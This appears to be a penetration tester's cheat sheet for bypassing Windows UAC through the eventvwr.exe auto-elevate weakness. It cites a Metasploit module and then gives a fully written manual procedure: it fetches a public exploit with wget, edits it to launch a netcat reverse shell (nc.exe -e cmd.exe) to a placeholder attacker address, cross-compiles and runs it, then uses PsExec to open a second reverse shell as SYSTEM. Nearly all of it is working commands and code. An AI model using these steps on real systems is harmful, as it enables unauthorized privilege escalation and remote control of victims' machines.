UAC Bypass – EventVwr

• Bypassing default UAC settings manually

Metasploit

Use Metasploit’s “exploit/windows/local/bypassuac_eventvwr”

UAC Bypass – Manual

copy \\x.x.x.x\myshare\SysinternalsSuite\PsExec64.exe PsExec64.exe
copy \\x.x.x.x\myshare\SysinternalsSuite\PsExec.exe PsExec.exe
copy \\x.x.x.x\myshare\SysinternalsSuite\strings64.exe strings64.exe
copy \\x.x.x.x\myshare\SysinternalsSuite\strings.exe strings.exe
copy \\x.x.x.x\myshare\nc.exe nc.exe

Check initial privileges

whoami /priv

.\PsExec64.exe -i -accepteula -d -s cmd.exe

As expected, this does not work. Gives “The handle is invalid”.

Check registry

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System

Check autoelevate

where /r C:\windows eventvwr.exe

strings64.exe -accepteula C:\Windows\System32\eventvwr.exe | findstr /i autoelevate

Download and modify exploit

wget -O eventvwr-bypassuac.c  https://raw.githubusercontent.com/turbo/zero2hero/master/main.c

Uncomment code and add command to execute.

GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\nc.exe -nv x.x.x.x 4444 -e cmd.exe");

Cross-Compile exploit

x86_64-w64-mingw32-gcc eventvwr-bypassuac.c -o eventvwr-bypassuac-64.exe

Start a listener and run the exploit

sudo nc -nlvp 4444

copy \\x.x.x.x\myshare\eventvwr-bypassuac-64.exe eventvwr-bypassuac-64.exe

.\eventvwr-bypassuac-64.exe

whoami /priv

Start a listener and run PsExec

Should give NT Authority.

sudo nc -nlvp 4445

.\PsExec64.exe -i -accepteula -d -s C:\Users\<username>\Desktop\nc.exe -nv x.x.x.x 4445 -e C:\Windows\System32\cmd.exe